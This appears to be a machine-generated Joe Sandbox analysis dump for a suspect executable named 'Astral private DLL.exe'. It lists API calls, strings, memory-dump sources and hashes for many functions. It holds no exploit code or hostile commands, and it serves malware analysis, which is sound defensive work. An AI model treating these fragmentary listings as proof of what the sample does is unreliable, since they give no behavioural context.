                                                                • GetProcAddress.KERNEL32(001A81C8,CryptUnprotectMemory), ref: 0016F2F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                • API String ID: 2141747552-1753850145
                                                                • Opcode ID: 5c60869385b1339cb8d8ec3b4d2aa9272199036fc345a38de1da76f064be1d20
                                                                • Instruction ID: 07531b5d8cfc46322340f25a1cfeb3003cf610bf4cd4e2eac99f542654221b43
                                                                • Opcode Fuzzy Hash: 5c60869385b1339cb8d8ec3b4d2aa9272199036fc345a38de1da76f064be1d20
                                                                • Instruction Fuzzy Hash: CEE08C70D50702AECB219F38AC4DB02BAE46F18714F18C82EF0EAE3A50DBB4D591CB50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer$_abort
                                                                • String ID:
                                                                • API String ID: 2252061734-0
                                                                • Opcode ID: 0eef31b1e601cf74a0db421777cc9d69dee96b47b9327d7f17db1cb6fff695ee
                                                                • Instruction ID: bbab4f9e1ec5755f45c4497e472fcf4f94db3c7bf08c5f2529324259a295925a
                                                                • Opcode Fuzzy Hash: 0eef31b1e601cf74a0db421777cc9d69dee96b47b9327d7f17db1cb6fff695ee
                                                                • Instruction Fuzzy Hash: D451E571500616AFDB2AAF54D845BBAB7A4FF54310F24462EEC05475A1E731EF40DF90
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0018BF39
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0018BF5C
                                                                  • Part of subcall function 00188E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018CA2C,00000000,?,00186CBE,?,00000008,?,001891E0,?,?,?), ref: 00188E38
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0018BF82
                                                                • _free.LIBCMT ref: 0018BF95
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0018BFA4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: a2e41a868f7da44985807e6a0f4edeb2352ebef5b398ad6116f7a763b6258a8b
                                                                • Instruction ID: 0309013305de1c67c114749b1e0e883589ef06c5c3fbd11f506a373ee2fad54c
                                                                • Opcode Fuzzy Hash: a2e41a868f7da44985807e6a0f4edeb2352ebef5b398ad6116f7a763b6258a8b
                                                                • Instruction Fuzzy Hash: FC0184766096157F23217AB65CCDC7BAB6DEFC2BA13150129FA04C2251EF608E029EB0
                                                                APIs
                                                                  • Part of subcall function 001711CF: ResetEvent.KERNEL32(?), ref: 001711E1
                                                                  • Part of subcall function 001711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001711F5
                                                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00170F21
                                                                • CloseHandle.KERNEL32(?,?), ref: 00170F3B
                                                                • DeleteCriticalSection.KERNEL32(?), ref: 00170F54
                                                                • CloseHandle.KERNEL32(?), ref: 00170F60
                                                                • CloseHandle.KERNEL32(?), ref: 00170F6C
                                                                  • Part of subcall function 00170FE4: WaitForSingleObject.KERNEL32(?,000000FF,00171206,?), ref: 00170FEA
                                                                  • Part of subcall function 00170FE4: GetLastError.KERNEL32(?), ref: 00170FF6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                • String ID:
                                                                • API String ID: 1868215902-0
                                                                • Opcode ID: d8080ae3a5835eda0978b3b063ad5b189d7745b78904e3ff5393574105ba6b80
                                                                • Instruction ID: 87868b04cff7108634a5f2755263650a66e5b4c5a787915c9fb344581c2d6c57
                                                                • Opcode Fuzzy Hash: d8080ae3a5835eda0978b3b063ad5b189d7745b78904e3ff5393574105ba6b80
                                                                • Instruction Fuzzy Hash: 99015E72100744EFC7229B64DC85BC6FBBAFB08B10F00492AF26A92560CB757A84CA50
                                                                APIs
                                                                • _free.LIBCMT ref: 0018C817
                                                                  • Part of subcall function 00188DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?), ref: 00188DE2
                                                                  • Part of subcall function 00188DCC: GetLastError.KERNEL32(?,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?,?), ref: 00188DF4
                                                                • _free.LIBCMT ref: 0018C829
                                                                • _free.LIBCMT ref: 0018C83B
                                                                • _free.LIBCMT ref: 0018C84D
                                                                • _free.LIBCMT ref: 0018C85F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5c38d283a38120fc8ecf4c285b7363d7530d37381287bf400eeabd0e1b7b9ccf
                                                                • Instruction ID: fe79d265a16fa5b4b5aadbc85585efa105cc350f348e0eb6e7ff662143a643fe
                                                                • Opcode Fuzzy Hash: 5c38d283a38120fc8ecf4c285b7363d7530d37381287bf400eeabd0e1b7b9ccf
                                                                • Instruction Fuzzy Hash: 4FF01232544200AB8620FBA8E485C1673EAAB11714794181AF108D7A52CB71FEC0CFA4
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00171FE5
                                                                • _wcslen.LIBCMT ref: 00171FF6
                                                                • _wcslen.LIBCMT ref: 00172006
                                                                • _wcslen.LIBCMT ref: 00172014
                                                                • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0016B371,?,?,00000000,?,?,?), ref: 0017202F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CompareString
                                                                • String ID:
                                                                • API String ID: 3397213944-0
                                                                • Opcode ID: 2b821818b856f1d5fef5daa0495b9255a7e68a5132c6d812cb7a24640f5eb304
                                                                • Instruction ID: 084bc813ce8ce2c6c9210eabfbaf419714ab970a007373bcf72742043870d51e
                                                                • Opcode Fuzzy Hash: 2b821818b856f1d5fef5daa0495b9255a7e68a5132c6d812cb7a24640f5eb304
                                                                • Instruction Fuzzy Hash: 4DF01D32008014BBCF266F51EC09DCE7F26EB54B61B258415F62A5A061CB72D7A2DB90
                                                                APIs
                                                                • _free.LIBCMT ref: 0018891E
                                                                  • Part of subcall function 00188DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?), ref: 00188DE2
                                                                  • Part of subcall function 00188DCC: GetLastError.KERNEL32(?,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?,?), ref: 00188DF4
                                                                • _free.LIBCMT ref: 00188930
                                                                • _free.LIBCMT ref: 00188943
                                                                • _free.LIBCMT ref: 00188954
                                                                • _free.LIBCMT ref: 00188965
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3dcc18a1ec098a8a284a5dafaa092c49aa140d6001d576ef2e818c7b1fb1171e
                                                                • Instruction ID: 8a66c7028ff77621ec3c4f4a38ad533cebb4cd4a6b59bf5aff63e897f836c687
                                                                • Opcode Fuzzy Hash: 3dcc18a1ec098a8a284a5dafaa092c49aa140d6001d576ef2e818c7b1fb1171e
                                                                • Instruction Fuzzy Hash: 50F0DA72810122DB8A46BF54FD028153FA2F7247247810606F51456BB1CFB18AC29F92
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _swprintf
                                                                • String ID: %ls$%s: %s
                                                                • API String ID: 589789837-2259941744
                                                                • Opcode ID: 7d04be869e1c71ccf782ffb54edf439820fde160e4ec256f076b07ab60a08065
                                                                • Instruction ID: ecc9179da1bbc9a7df0be391bbeb57318d6dc5b3d506decb41e524b1e1ed7831
                                                                • Opcode Fuzzy Hash: 7d04be869e1c71ccf782ffb54edf439820fde160e4ec256f076b07ab60a08065
                                                                • Instruction Fuzzy Hash: AD510735288300F6EB2D1AACCD46F757276BB15B04F25C606F39E744E1DBE2A520A71B
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Astral private DLL.exe,00000104), ref: 00187FAE
                                                                • _free.LIBCMT ref: 00188079
                                                                • _free.LIBCMT ref: 00188083
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe
                                                                • API String ID: 2506810119-3478925573
                                                                • Opcode ID: 89f73d4d28a005df030415d6f4fcced3a935a35b8bf763619d72448df8e90280
                                                                • Instruction ID: 79457f7c1d47c9dfbd7123d4b1261a2626287be20be82de2105a3c970700931f
                                                                • Opcode Fuzzy Hash: 89f73d4d28a005df030415d6f4fcced3a935a35b8bf763619d72448df8e90280
                                                                • Instruction Fuzzy Hash: 3C31AE71A04218AFCB21EF99DC80DAEBBFCEBA5310F54406AF90497211DB708B85CF61
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001831FB
                                                                • _abort.LIBCMT ref: 00183306
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer_abort
                                                                • String ID: MOC$RCC
                                                                • API String ID: 948111806-2084237596
                                                                • Opcode ID: 68c34a1c3972f92c79591cdae12bc531c501656e5473ed5efe265bf7779550e0
                                                                • Instruction ID: 8a762e069d5990c0e8183ef95f192e11ce2d405aef40ab5d29ec52c81735f573
                                                                • Opcode Fuzzy Hash: 68c34a1c3972f92c79591cdae12bc531c501656e5473ed5efe265bf7779550e0
                                                                • Instruction Fuzzy Hash: 9C414871900209AFCF16EF98CD81AAEBBB6BF48714F188159F914A7222D335AB50DF50
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00167406
                                                                  • Part of subcall function 00163BBA: __EH_prolog.LIBCMT ref: 00163BBF
                                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 001674CD
                                                                  • Part of subcall function 00167A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00167AAB
                                                                  • Part of subcall function 00167A9C: GetLastError.KERNEL32 ref: 00167AF1
                                                                  • Part of subcall function 00167A9C: CloseHandle.KERNEL32(?), ref: 00167B00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                • API String ID: 3813983858-639343689
                                                                • Opcode ID: 984aa28c6bf631defc73bd17e4058da80f3c8b8d9b9f467fe9f2c30e130359ee
                                                                • Instruction ID: 7cb775edad333f3241b4440ab9471279f5f7f125ff0c42df2b75523e8dc9f73c
                                                                • Opcode Fuzzy Hash: 984aa28c6bf631defc73bd17e4058da80f3c8b8d9b9f467fe9f2c30e130359ee
                                                                • Instruction Fuzzy Hash: 2231E471D04258BEDF11EBA4CC45FEEBBB8AF29308F044055F445A71C2CB748AA4CB60
                                                                APIs
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • EndDialog.USER32(?,00000001), ref: 0017AD98
                                                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0017ADAD
                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0017ADC2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemText$DialogWindow
                                                                • String ID: ASKNEXTVOL
                                                                • API String ID: 445417207-3402441367
                                                                • Opcode ID: 44bb1ff42c1fa28e2daff537ea6f99b290701500e85a21dd88232ab20479ef99
                                                                • Instruction ID: 870ae3bcecf04c31038afeb7d0ef75aac988e1a2580997a865cd61386268d03c
                                                                • Opcode Fuzzy Hash: 44bb1ff42c1fa28e2daff537ea6f99b290701500e85a21dd88232ab20479ef99
                                                                • Instruction Fuzzy Hash: A2119332280200BFD7219FA8DC45FAE7B79EF9B742F844010F245DBDA1C761D9659726
                                                                APIs
                                                                • __fprintf_l.LIBCMT ref: 0016D954
                                                                • _strncpy.LIBCMT ref: 0016D99A
                                                                  • Part of subcall function 00171DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,001A1030,00000200,0016D928,00000000,?,00000050,001A1030), ref: 00171DC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                • String ID: $%s$@%s
                                                                • API String ID: 562999700-834177443
                                                                • Opcode ID: 555c8d3cbbec879d03bc0b3837dfb8f62f4e6c69533d4027b860cb9561b325b3
                                                                • Instruction ID: e9f726db243bc9e8f1671dc6389bee28975df1c7db6d05287c63c246da7c7441
                                                                • Opcode Fuzzy Hash: 555c8d3cbbec879d03bc0b3837dfb8f62f4e6c69533d4027b860cb9561b325b3
                                                                • Instruction Fuzzy Hash: E7217272A40348AEEF21EEA4DC05FEE7BE8AF15708F044512F914D61A2E372D668CF51
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0016AC5A,00000008,?,00000000,?,0016D22D,?,00000000), ref: 00170E85
                                                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0016AC5A,00000008,?,00000000,?,0016D22D,?,00000000), ref: 00170E8F
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0016AC5A,00000008,?,00000000,?,0016D22D,?,00000000), ref: 00170E9F
                                                                Strings
                                                                • Thread pool initialization failed., xrefs: 00170EB7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                • String ID: Thread pool initialization failed.
                                                                • API String ID: 3340455307-2182114853
                                                                • Opcode ID: 9c6bcd3849cc8a198103fecc8cd98a6d6c764fab0245a296d2cdaed2243161cb
                                                                • Instruction ID: dfb98b227c249c137e17d865d1f4f7d8daae5fc30ae6a2bbcfa238ca84b2d153
                                                                • Opcode Fuzzy Hash: 9c6bcd3849cc8a198103fecc8cd98a6d6c764fab0245a296d2cdaed2243161cb
                                                                • Instruction Fuzzy Hash: 331151B1640708EFC3215F7ADC849A7FBECEB69744F14882EF1DAC2200DB715A818B60
                                                                APIs
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • EndDialog.USER32(?,00000001), ref: 0017B2BE
                                                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0017B2D6
                                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 0017B304
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemText$DialogWindow
                                                                • String ID: GETPASSWORD1
                                                                • API String ID: 445417207-3292211884
                                                                • Opcode ID: 959deacf05d3f23b48ea248eee84e4a09f0b440fe5fb61d3ea2a992853f1aa28
                                                                • Instruction ID: 59717487d4a034c564dccf757876863d15cb76cbaddf8dac94c6fa5aaa945723
                                                                • Opcode Fuzzy Hash: 959deacf05d3f23b48ea248eee84e4a09f0b440fe5fb61d3ea2a992853f1aa28
                                                                • Instruction Fuzzy Hash: E811E5329041147ADB129A649C89FFF3B7DFB19700F048020FA49B2580D7A0E9518771
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
